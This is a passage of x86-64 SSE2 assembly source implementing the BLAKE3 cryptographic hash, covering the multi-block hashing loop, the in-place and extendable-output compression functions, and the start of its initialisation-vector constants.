pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0x60]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xF0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
pxor xmm0, xmm8
pxor xmm1, xmm9
pxor xmm2, xmm10
pxor xmm3, xmm11
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
pxor xmm4, xmm12
pxor xmm5, xmm13
pxor xmm6, xmm14
pxor xmm7, xmm15
mov eax, r13d
jne 9b
movdqa xmm9, xmm0
punpckldq xmm0, xmm1
punpckhdq xmm9, xmm1
movdqa xmm11, xmm2
punpckldq xmm2, xmm3
punpckhdq xmm11, xmm3
movdqa xmm1, xmm0
punpcklqdq xmm0, xmm2
punpckhqdq xmm1, xmm2
movdqa xmm3, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm3, xmm11
movdqu xmmword ptr [rbx], xmm0
movdqu xmmword ptr [rbx+0x20], xmm1
movdqu xmmword ptr [rbx+0x40], xmm9
movdqu xmmword ptr [rbx+0x60], xmm3
movdqa xmm9, xmm4
punpckldq xmm4, xmm5
punpckhdq xmm9, xmm5
movdqa xmm11, xmm6
punpckldq xmm6, xmm7
punpckhdq xmm11, xmm7
movdqa xmm5, xmm4
punpcklqdq xmm4, xmm6
punpckhqdq xmm5, xmm6
movdqa xmm7, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm7, xmm11
movdqu xmmword ptr [rbx+0x10], xmm4
movdqu xmmword ptr [rbx+0x30], xmm5
movdqu xmmword ptr [rbx+0x50], xmm9
movdqu xmmword ptr [rbx+0x70], xmm7
movdqa xmm1, xmmword ptr [rsp+0x110]
movdqa xmm0, xmm1
paddd xmm1, xmmword ptr [rsp+0x150]
movdqa xmmword ptr [rsp+0x110], xmm1
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm0, xmm1
movdqa xmm1, xmmword ptr [rsp+0x120]
psubd xmm1, xmm0
movdqa xmmword ptr [rsp+0x120], xmm1
add rbx, 128
add rdi, 32
sub rsi, 4
cmp rsi, 4
jnc 2b
test rsi, rsi
jnz 3f
4:
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 5
3:
test esi, 0x2
je 3f
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movaps xmm8, xmm0
movaps xmm9, xmm1
movd xmm13, dword ptr [rsp+0x110]
movd xmm14, dword ptr [rsp+0x120]
punpckldq xmm13, xmm14
movaps xmmword ptr [rsp], xmm13
movd xmm14, dword ptr [rsp+0x114]
movd xmm13, dword ptr [rsp+0x124]
punpckldq xmm14, xmm13
movaps xmmword ptr [rsp+0x10], xmm14
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movaps xmm10, xmm2
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm3, xmm4
shufps xmm4, xmm5, 136
shufps xmm3, xmm5, 221
movaps xmm5, xmm3
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm3, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm3, xmm7, 221
pshufd xmm7, xmm3, 0x93
movups xmm12, xmmword ptr [r9+rdx-0x40]
movups xmm13, xmmword ptr [r9+rdx-0x30]
movaps xmm11, xmm12
shufps xmm12, xmm13, 136
shufps xmm11, xmm13, 221
movaps xmm13, xmm11
movups xmm14, xmmword ptr [r9+rdx-0x20]
movups xmm15, xmmword ptr [r9+rdx-0x10]
movaps xmm11, xmm14
shufps xmm14, xmm15, 136
pshufd xmm14, xmm14, 0x93
shufps xmm11, xmm15, 221
pshufd xmm15, xmm11, 0x93
shl rax, 0x20
or rax, 0x40
movq xmm3, rax
movdqa xmmword ptr [rsp+0x20], xmm3
movaps xmm3, xmmword ptr [rsp]
movaps xmm11, xmmword ptr [rsp+0x10]
punpcklqdq xmm3, xmmword ptr [rsp+0x20]
punpcklqdq xmm11, xmmword ptr [rsp+0x20]
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm8, xmm12
movaps xmmword ptr [rsp+0x20], xmm4
movaps xmmword ptr [rsp+0x30], xmm12
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
pshuflw xmm11, xmm11, 0xB1
pshufhw xmm11, xmm11, 0xB1
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm5
paddd xmm8, xmm13
movaps xmmword ptr [rsp+0x40], xmm5
movaps xmmword ptr [rsp+0x50], xmm13
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movdqa xmm13, xmm3
psrld xmm3, 8
pslld xmm13, 24
pxor xmm3, xmm13
movdqa xmm13, xmm11
psrld xmm11, 8
pslld xmm13, 24
pxor xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x93
pshufd xmm8, xmm8, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x39
pshufd xmm10, xmm10, 0x39
paddd xmm0, xmm6
paddd xmm8, xmm14
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
pshuflw xmm11, xmm11, 0xB1
pshufhw xmm11, xmm11, 0xB1
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm7
paddd xmm8, xmm15
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movdqa xmm13, xmm3
psrld xmm3, 8
pslld xmm13, 24
pxor xmm3, xmm13
movdqa xmm13, xmm11
psrld xmm11, 8
pslld xmm13, 24
pxor xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x39
pshufd xmm8, xmm8, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x93
pshufd xmm10, xmm10, 0x93
dec al
je 9f
movdqa xmm12, xmmword ptr [rsp+0x20]
movdqa xmm5, xmmword ptr [rsp+0x40]
pshufd xmm13, xmm12, 0x0F
shufps xmm12, xmm5, 214
pshufd xmm4, xmm12, 0x39
movdqa xmm12, xmm6
shufps xmm12, xmm7, 250
pand xmm13, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm12, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm13, xmm12
movdqa xmmword ptr [rsp+0x20], xmm13
movdqa xmm12, xmm7
punpcklqdq xmm12, xmm5
movdqa xmm13, xmm6
pand xmm12, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm13, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm12, xmm13
pshufd xmm12, xmm12, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmmword ptr [rsp+0x40], xmm12
movdqa xmm5, xmmword ptr [rsp+0x30]
movdqa xmm13, xmmword ptr [rsp+0x50]
pshufd xmm6, xmm5, 0x0F
shufps xmm5, xmm13, 214
pshufd xmm12, xmm5, 0x39
movdqa xmm5, xmm14
shufps xmm5, xmm15, 250
pand xmm6, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm5, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm6, xmm5
movdqa xmm5, xmm15
punpcklqdq xmm5, xmm13
movdqa xmmword ptr [rsp+0x30], xmm2
movdqa xmm2, xmm14
pand xmm5, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm2, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm5, xmm2
movdqa xmm2, xmmword ptr [rsp+0x30]
pshufd xmm5, xmm5, 0x78
punpckhdq xmm13, xmm15
punpckldq xmm14, xmm13
pshufd xmm15, xmm14, 0x1E
movdqa xmm13, xmm6
movdqa xmm14, xmm5
movdqa xmm5, xmmword ptr [rsp+0x20]
movdqa xmm6, xmmword ptr [rsp+0x40]
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm8, xmm10
pxor xmm9, xmm11
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
movups xmmword ptr [rbx+0x20], xmm8
movups xmmword ptr [rbx+0x30], xmm9
mov eax, dword ptr [rsp+0x130]
neg eax
mov r10d, dword ptr [rsp+0x110+8*rax]
mov r11d, dword ptr [rsp+0x120+8*rax]
mov dword ptr [rsp+0x110], r10d
mov dword ptr [rsp+0x120], r11d
add rdi, 16
add rbx, 64
sub rsi, 2
3:
test esi, 0x1
je 4b
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movd xmm13, dword ptr [rsp+0x110]
movd xmm14, dword ptr [rsp+0x120]
punpckldq xmm13, xmm14
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
shl rax, 32
or rax, 64
movq xmm12, rax
movdqa xmm3, xmm13
punpcklqdq xmm3, xmm12
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pand xmm9, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm8, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm9, xmm8
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
movdqa xmm10, xmm6
pand xmm8, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm10, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm8, xmm10
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
jmp 4b
.p2align 6
blake3_compress_in_place_sse2:
_blake3_compress_in_place_sse2:
_CET_ENDBR
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
shl r8, 32
add rdx, r8
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pand xmm9, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm8, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm9, xmm8
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
movdqa xmm10, xmm6
pand xmm8, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm10, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm8, xmm10
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
movups xmmword ptr [rdi], xmm0
movups xmmword ptr [rdi+0x10], xmm1
ret
.p2align 6
blake3_compress_xof_sse2:
_blake3_compress_xof_sse2:
_CET_ENDBR
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pand xmm9, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm8, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm9, xmm8
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
movdqa xmm10, xmm6
pand xmm8, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm10, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm8, xmm10
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
movdqu xmm4, xmmword ptr [rdi]
movdqu xmm5, xmmword ptr [rdi+0x10]
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm2, xmm4
pxor xmm3, xmm5
movups xmmword ptr [r9], xmm0
movups xmmword ptr [r9+0x10], xmm1
movups xmmword ptr [r9+0x20], xmm2
movups xmmword ptr [r9+0x30], xmm3
ret
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
.p2align 6
BLAKE3_IV:
.long 0x6A09E667, 0xBB67AE85
.long 0x3C6EF372, 0xA54FF53A
